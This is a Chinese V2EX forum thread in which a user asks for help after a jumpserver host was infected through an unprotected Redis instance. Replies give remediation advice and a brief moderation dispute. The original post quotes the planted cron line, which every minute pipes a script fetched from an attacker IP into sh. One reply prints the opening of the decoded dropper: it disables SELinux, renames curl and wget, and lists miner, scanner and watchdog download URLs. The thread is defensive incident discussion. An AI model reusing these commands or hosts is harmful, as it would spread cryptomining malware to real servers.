服务器被马了,求帮忙

2019-06-21 09:43:42 +08:00
 xiaotianhu

公司用了个 jumpserver 做跳板机,之前运维同学弄的 版本 Version 1.3.2-2

今天发现连不上了.

进去发现 redis 出了问题.redis 是本地启动的,监听内网端口 排查发现 rdb 文件写入没权限,写入目录 /etc/cron.d 这...肯定不对啊.发现写入了一个文件:

文件内容 */1 * * * * curl -fsSL http://103.35.72.209:8667/6HqJB0SPQqbFbHJD/init.sh |sh

被马无疑了.但是写入报了权限问题?这个文件怎么还写入成功了.

现在想研究一下这个马,然后对服务器得全处理一下了.头疼. 这个马怎么解 shell 玩的不好,求帮忙

9393 次点击
所在节点    程序员
49 条回复
version
2019-06-21 13:51:11 +08:00
应该是你服务器主机没有屏蔽 6379 端口,我之前测试服务器也是试过,平时正常是 127 本机监控,后来业务开内网监听就出事了,后来发现安全组没有开屏蔽 6379,以前研究过,还找到了挖矿账号,查到不少余额,不过也只能重新安装了,一般服务器开防火墙应该没问题,攻击来源也没猜到,其它人也用,评定不了
oneisall8955
2019-06-21 13:58:34 +08:00
早就遇到过了 redis 的端口和配置问题,
1 没密码
2 端口太普通
3 默认配置有那个写本地的权限
解决方案,指标+治本
1,按照网上重新配置密码端口和去掉权限
2,kill 掉进程
3,删除公钥中不是你的密钥
4,删除 crontab 里面的定时任务
lepig
2019-06-21 14:08:46 +08:00
楼主可以参考下 这个帖子

https://www.v2ex.com/t/537457#reply106
lepig
2019-06-21 14:09:59 +08:00
提供一个清理脚本,仅供参考。我在自己的个人服务器上执行过
https://coding.net/u/omg/p/AA/git/blob/master/%E6%B8%85%E7%90%86%E8%84%9A%E6%9C%AC.sh


不过,如果可以 还是建议重装一次系统
linnil
2019-06-21 14:13:33 +08:00
能 ps 出那个进程么? vi 删掉定时任务之后会立刻重新恢复么?/proc 下有对应进程 ID 的文件夹么?
如果上面的回答都是 no,那么准备好迁移的数据,重装系统吧。如果不是,参考前面给的建议。
对付`rootkit`难度爆表。
liuyi_beta
2019-06-21 14:58:17 +08:00
把脚本里的 eval 改成 echo,在 shell 里执行,看解密出来的那一串字符,然后 rev,就是一串 base64,然后解码就能看到具体的脚本执行内容了,就是挖矿脚本
pyengwoei
2019-06-21 15:25:32 +08:00
@Livid 能看看 我帐户被 BAN 了吗 /(ㄒoㄒ)/~~ 发帖子感觉都没人看见了
viruser
2019-06-21 15:43:28 +08:00
还是 ddg 挖矿木马,可能内网机子由于其他原因感染了木马,然后木马爆破出 redis 密码进行了横向扩散。新木马和之前的相比,新木马尝试使用 drupal, Elasticsearch, Hadoop, redis, spring, sqlserver, ssh, thinkphp, weblogic 等服务的配置失误 /漏洞进行 RCE... ![Annotation 2019-06-21 153649.png]( https://i.loli.net/2019/06/21/5d0c892adfa7978592.png)
dunhanson
2019-06-21 15:49:24 +08:00
@Livid

具体到这个问题
10 个人装 linux,就有 10 种不同的 linux
所以不上机器,就猜火车,我觉得远不如上去看看到底是怎么回事有用
redis 的漏洞我见过两种,所以懒得猜,看具体情况再分析

版主的言论和脑回路真是不敢苟同

每个人可以选择相信别人,也可以选择不信
物以类聚,人以群分嘛

至少我在 v2 的时候帮人解决了不少问题,交易也都先付款,感觉还颇不错
很有诚信的一个论坛

找了几贴(被封了还翻贴真累撒):
https://v2ex.com/t/530877#reply19
https://www.v2ex.com/t/534100#reply29
https://v2ex.com/t/530578#reply54
再靠前的就懒得翻了

感觉版主跟 abmin521 是同一类人

封了就封了吧,最近 V2 也怪怪的,似乎大家也很争议。
dunhanson
2019-06-21 15:50:46 +08:00
@Livid 被封的老哥,之前帮我解决过 K8S 的问题,代回复一下
Livid
2019-06-21 15:52:55 +08:00
@dunhanson 谢谢你。我看了那些帖子。这件事情上是我错了。已将 @defunct9 的账号恢复:对不起,是我的错。
defunct9
2019-06-21 16:04:08 +08:00
从小黑屋里放出来啦。

@dunhanson 多谢啦
@Livid 我也收回自己的言论,抱歉。
zhouwei520
2019-06-21 16:26:19 +08:00
@defunct9 @dunhanson 好暖 \(^o^)/~
Allenqjy
2019-06-21 16:29:55 +08:00
@defunct9 加油!
firebroo
2019-06-21 17:09:46 +08:00
太长了,复制不出来,你找个虚拟机 sh -x xx.sh 就行
#!/bin/sh
setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/sysupdates
rtdir="/etc/sysupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/url"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/get"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/curl /usr/bin/url
miner_url="https://pixeldrain.com/api/file/qfCJh56W"
miner_url_backup="http://103.35.72.209:8667/6HqJB0SPQqbFbHJD/sysupdate"
miner_size="854364"
sh_url="http://103.35.72.209:8667/6HqJB0SPQqbFbHJD/update.sh"
sh_url_backup="http://103.35.72.209:8667/6HqJB0SPQqbFbHJD/update.sh"
config_url="http://103.35.72.209:8667/6HqJB0SPQqbFbHJD/config.json"
config_url_backup="http://103.35.72.209:8667/6HqJB0SPQqbFbHJD/config.json"
config_size="3300"
scan_url="https://pixeldrain.com/api/file/GXot-j_7"
scan_url_backup="http://103.35.72.209:8667/6HqJB0SPQqbFbHJD/networkservice"
scan_size="2345296"
watchdog_url="https://pixeldrain.com/api/file/9aWNKUNO"
watchdog_url_backup="http://103.35.72.209:8667/6HqJB0SPQqbFbHJD/sysguard"
watchdog_size="1587024"
abcdocker
2019-06-21 17:12:53 +08:00
学习我的博客,研究一下运维如何快速购买机票跑路
i4t.com
dif
2019-06-21 17:34:07 +08:00
我也遇到过,加了个密码就解决了。
docker run -d --name redis-server -p 6379:6379 redis --requirepass "用 1password 生成的密码"就行了。
mink
2019-06-21 17:40:45 +08:00
我也遇到过,在腾讯云使用 docker redis 镜像的时候发现有挖矿脚本。 怕服务器里面还有脚本就重装了, 然后 redis 下载了官方的没有用 docker, 怀疑是 docker 中 redis 镜像已经中招了。
imlz
2019-06-21 18:33:02 +08:00
@xiaotianhu 你好,我是 jumpserver 的代码贡献者之一,你说的问题我们能否私聊一下? liuzheng712@gmail.com
akira
2019-06-21 19:45:58 +08:00
重新搭建一套服务器环境吧,原环境应该都是不可靠的了

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/576076

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX